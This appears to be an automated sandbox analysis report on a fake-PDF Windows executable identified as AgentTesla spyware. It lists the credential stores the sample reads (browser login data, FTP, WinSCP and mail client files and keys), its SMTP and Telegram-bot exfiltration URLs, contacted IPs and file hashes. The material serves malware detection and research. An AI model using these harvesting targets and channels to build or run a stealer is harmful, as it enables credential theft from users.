              Source: New Order Inquiry.PDF.exe, 00000000.00000002.230902914.0000000002461000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: New Order Inquiry.PDF.exe, 00000000.00000002.230902914.0000000002461000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeCode function: 2_2_01704068 LdrInitializeThunk,
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeMemory allocated: page read and write | page guard
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeProcess created: C:\Users\user\Desktop\New Order Inquiry.PDF.exe C:\Users\user\Desktop\New Order Inquiry.PDF.exe
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493438325.0000000001C90000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493438325.0000000001C90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493438325.0000000001C90000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: New Order Inquiry.PDF.exe, 00000002.00000002.493438325.0000000001C90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Users\user\Desktop\New Order Inquiry.PDF.exe VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Users\user\Desktop\New Order Inquiry.PDF.exe VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000002.00000002.489798075.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.231364054.0000000003469000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: New Order Inquiry.PDF.exe PID: 6604, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: New Order Inquiry.PDF.exe PID: 6808, type: MEMORY
              Source: Yara matchFile source: 2.2.New Order Inquiry.PDF.exe.400000.0.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\New Order Inquiry.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: Yara matchFile source: 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: New Order Inquiry.PDF.exe PID: 6808, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000002.00000002.489798075.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.231364054.0000000003469000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: New Order Inquiry.PDF.exe PID: 6604, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: New Order Inquiry.PDF.exe PID: 6808, type: MEMORY
              Source: Yara matchFile source: 2.2.New Order Inquiry.PDF.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection12Masquerading21OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion13Input Capture11Security Software Discovery211Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Credentials in Registry1Virtualization/Sandbox Evasion13SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSProcess Discovery2Distributed Component Object ModelData from Local System2Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information12LSA SecretsApplication Window Discovery1SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing3Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              New Order Inquiry.PDF.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              2.2.New Order Inquiry.PDF.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://smtp.divasvalves.com0%Avira URL Cloudsafe
              https://8vhVWmhsLg6p.comH#70%Avira URL Cloudsafe
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://zwdNmL.com0%Avira URL Cloudsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              https://8vhVWmhsLg6p.com0%Avira URL Cloudsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
              https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
              https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
              https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              us2.smtp.mailhostbox.com
              208.91.198.143
              truefalse
                high
                smtp.divasvalves.com
                unknown
                unknowntrue
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://smtp.divasvalves.comNew Order Inquiry.PDF.exe, 00000002.00000002.496450719.00000000035FB000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://8vhVWmhsLg6p.comH#7New Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://127.0.0.1:HTTP/1.1New Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://zwdNmL.comNew Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://DynDns.comDynDNSNew Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://8vhVWmhsLg6p.comNew Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmp, New Order Inquiry.PDF.exe, 00000002.00000003.445087309.0000000001554000.00000004.00000001.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://us2.smtp.mailhostbox.comNew Order Inquiry.PDF.exe, 00000002.00000002.496450719.00000000035FB000.00000004.00000001.sdmpfalse
                    high
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haNew Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://api.telegram.org/bot%telegramapi%/New Order Inquiry.PDF.exe, 00000000.00000002.231364054.0000000003469000.00000004.00000001.sdmp, New Order Inquiry.PDF.exe, 00000002.00000002.489798075.0000000000402000.00000040.00000001.sdmpfalse
                      high
                      https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xNew Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpfalse
                        high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipNew Order Inquiry.PDF.exe, 00000000.00000002.231364054.0000000003469000.00000004.00000001.sdmp, New Order Inquiry.PDF.exe, 00000002.00000002.489798075.0000000000402000.00000040.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://api.ipify.orgGETMozilla/5.0New Order Inquiry.PDF.exe, 00000002.00000002.493883297.00000000032E1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        208.91.198.143
                        unknownUnited States
                        394695PUBLIC-DOMAIN-REGISTRYUSfalse

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:326328
                        Start date:03.12.2020
                        Start time:09:55:52
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 9s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:New Order Inquiry.PDF.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:22
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@3/2@2/2
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 0.3% (good quality ratio 0.2%)
                        • Quality average: 55.4%
                        • Quality standard deviation: 23.5%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 13.88.21.125, 13.64.90.137, 104.43.193.48, 92.122.144.200, 51.11.168.160, 20.54.26.129, 2.20.142.209, 2.20.142.210, 51.104.144.132, 92.122.213.247, 92.122.213.194
                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/326328/sample/New Order Inquiry.PDF.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        09:56:50API Interceptor810x Sleep call for process: New Order Inquiry.PDF.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        208.91.198.143Swift Copy.exeGet hashmaliciousBrowse
                          SecuriteInfo.com.Generic.mg.0944e0c972d02445.exeGet hashmaliciousBrowse
                            dULgYAKQ5L.exeGet hashmaliciousBrowse
                              SOA_payment_balance.doc.gz.exeGet hashmaliciousBrowse
                                CORRECT INVOICE.exeGet hashmaliciousBrowse
                                  Payment copy.exeGet hashmaliciousBrowse
                                    BILL OF LADING SHIPPING DOCSPDF.exeGet hashmaliciousBrowse
                                      0hgHwEkIWY.exeGet hashmaliciousBrowse
                                        Shipping doc.pdf.exeGet hashmaliciousBrowse
                                          Shipping Details.exeGet hashmaliciousBrowse
                                            PAYMENT SLIP.exeGet hashmaliciousBrowse
                                              fx2C5jUjRT.exeGet hashmaliciousBrowse
                                                SecuriteInfo.com.Trojan.PackedNET.461.31996.exeGet hashmaliciousBrowse
                                                  qLCU7kIsgt.exeGet hashmaliciousBrowse
                                                    sFCFmEXJ2e.exeGet hashmaliciousBrowse
                                                      wJsynh1HNX.exeGet hashmaliciousBrowse
                                                        MELaXQrtDH.exeGet hashmaliciousBrowse
                                                          On0dcNYXhD.exeGet hashmaliciousBrowse
                                                            New Order.gz.exeGet hashmaliciousBrowse
                                                              NINO.exeGet hashmaliciousBrowse

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                us2.smtp.mailhostbox.comSalary_PMT.exeGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                Swift Copy.exeGet hashmaliciousBrowse
                                                                • 208.91.198.143
                                                                Scan0202.exeGet hashmaliciousBrowse
                                                                • 208.91.199.225
                                                                F9g721I4sS.rtfGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                Payment advise_pdf__________________________________.exeGet hashmaliciousBrowse
                                                                • 208.91.199.225
                                                                Fagner Order_pdf.exeGet hashmaliciousBrowse
                                                                • 208.91.199.223
                                                                PO-789906504.exeGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                Al Jaber Dubai.exeGet hashmaliciousBrowse
                                                                • 208.91.199.223
                                                                SecuriteInfo.com.Generic.mg.bcffd84bcd9111df.exeGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                SecuriteInfo.com.Generic.mg.db37503e0e66b5c4.exeGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                New Order.xlsxGet hashmaliciousBrowse
                                                                • 208.91.199.225
                                                                vbc.exeGet hashmaliciousBrowse
                                                                • 208.91.199.223
                                                                SecuriteInfo.com.Generic.mg.0944e0c972d02445.exeGet hashmaliciousBrowse
                                                                • 208.91.198.143
                                                                inquiry.xlsxGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                vbc.exeGet hashmaliciousBrowse
                                                                • 208.91.199.223
                                                                Invoice.xlsxGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                Purchase Order 1508521.xlsxGet hashmaliciousBrowse
                                                                • 208.91.199.223
                                                                Purchase Order 1508521.xlsxGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                PO. NO. 20201240001.xlsxGet hashmaliciousBrowse
                                                                • 208.91.198.143
                                                                Shipping Documents.exeGet hashmaliciousBrowse
                                                                • 208.91.199.224

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                PUBLIC-DOMAIN-REGISTRYUSSalary_PMT.exeGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                Swift Copy.exeGet hashmaliciousBrowse
                                                                • 208.91.198.143
                                                                Scan0202.exeGet hashmaliciousBrowse
                                                                • 208.91.199.225
                                                                F9g721I4sS.rtfGet hashmaliciousBrowse
                                                                • 208.91.199.225
                                                                Payment advise_pdf__________________________________.exeGet hashmaliciousBrowse
                                                                • 208.91.199.225
                                                                Fagner Order_pdf.exeGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                PO-789906504.exeGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                Al Jaber Dubai.exeGet hashmaliciousBrowse
                                                                • 208.91.199.223
                                                                AddressValidateForm-490710598-12022020.xlsGet hashmaliciousBrowse
                                                                • 103.195.185.149
                                                                AddressValidateForm-490710598-12022020.xlsGet hashmaliciousBrowse
                                                                • 103.195.185.149
                                                                https://dynalist.io/d/TcKkPvWijzGN4uv-0OCmM26AGet hashmaliciousBrowse
                                                                • 199.79.62.144
                                                                https://www.paperturn-view.com/?pid=MTI128610Get hashmaliciousBrowse
                                                                • 199.79.62.243
                                                                r.dllGet hashmaliciousBrowse
                                                                • 103.53.40.79
                                                                SecuriteInfo.com.Generic.mg.bcffd84bcd9111df.exeGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                SecuriteInfo.com.Generic.mg.db37503e0e66b5c4.exeGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                New Order.xlsxGet hashmaliciousBrowse
                                                                • 208.91.199.225
                                                                vbc.exeGet hashmaliciousBrowse
                                                                • 208.91.199.223
                                                                SecuriteInfo.com.Generic.mg.0944e0c972d02445.exeGet hashmaliciousBrowse
                                                                • 208.91.198.143
                                                                inquiry.xlsxGet hashmaliciousBrowse
                                                                • 208.91.199.224
                                                                vbc.exeGet hashmaliciousBrowse
                                                                • 208.91.199.223

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Order Inquiry.PDF.exe.log
                                                                Process:C:\Users\user\Desktop\New Order Inquiry.PDF.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):792
                                                                Entropy (8bit):5.331449916613832
                                                                Encrypted:false
                                                                SSDEEP:24:MLKE4K5E4Ks29E4Kx1qE4x84qXKDE4KhK3VZ9pKhk:MuHK5HKX9HKx1qHxviYHKhQnok
                                                                MD5:48C35637F4E5AE32A768BDF159A4B32E
                                                                SHA1:C27B5E37426D6496AF195A39B7882DF50341EE4A
                                                                SHA-256:43567270C0C1C1BCD458595B138034B2A6F6DC4B2DFFA475AE7D629BE4C93BD2
                                                                SHA-512:B4E98A592CC5EDB8E3379283756A01B7712922748BF4FC19E41B1205DD404367C11357BB17824419A2C4B2CE007BEAA55EBA97F602BC5B361EABC222CBC0374D
                                                                Malicious:true
                                                                Reputation:moderate, very likely benign file
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                C:\Users\user\AppData\Roaming\pwrpouac.23y\Chrome\Default\Cookies
                                                                Process:C:\Users\user\Desktop\New Order Inquiry.PDF.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):0.6970840431455908
                                                                Encrypted:false
                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):6.9921837086019565
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:New Order Inquiry.PDF.exe
                                                                File size:678912
                                                                MD5:a0ce94d59dc8204e8cdbce7c4d635d32
                                                                SHA1:8599d6d2c48067e3c29cd751dba94ed06313fd75
                                                                SHA256:415e3b94a339a45d036814c1bfbae3a24befccaf6bbba44a5265613f3aec3ef7
                                                                SHA512:727df172278b6efb0b6659c51502f76e2d2d9288691796244d8a2719f54c8d87436c37cc2ac1c08edd2e084cbe0e252fc9ac7494a74304836efdd9e3b95b5cea
                                                                SSDEEP:12288:dCwIOQkVSTBzKLpq5ymZviBzXCBkfSdT7MvZgwu22qPVGNbTuMuKBD7hpvA:dDfkBzoA5ymYZx6VAmwuKST0sDd
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................P...........o... ........@.. ....................................@................................

                                                                File Icon

                                                                Icon Hash:00828e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4a6f2e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0x5FC88D2E [Thu Dec 3 07:01:02 2020 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:v4.0.30319
                                                                OS Version Major:4
                                                                OS Version Minor:0
